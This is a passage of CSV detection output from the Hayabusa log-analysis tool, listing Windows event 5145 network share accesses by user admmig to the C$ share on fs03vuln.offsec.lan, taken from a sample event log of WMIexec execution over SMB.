+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.694 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.694 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.725 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.725 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.741 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 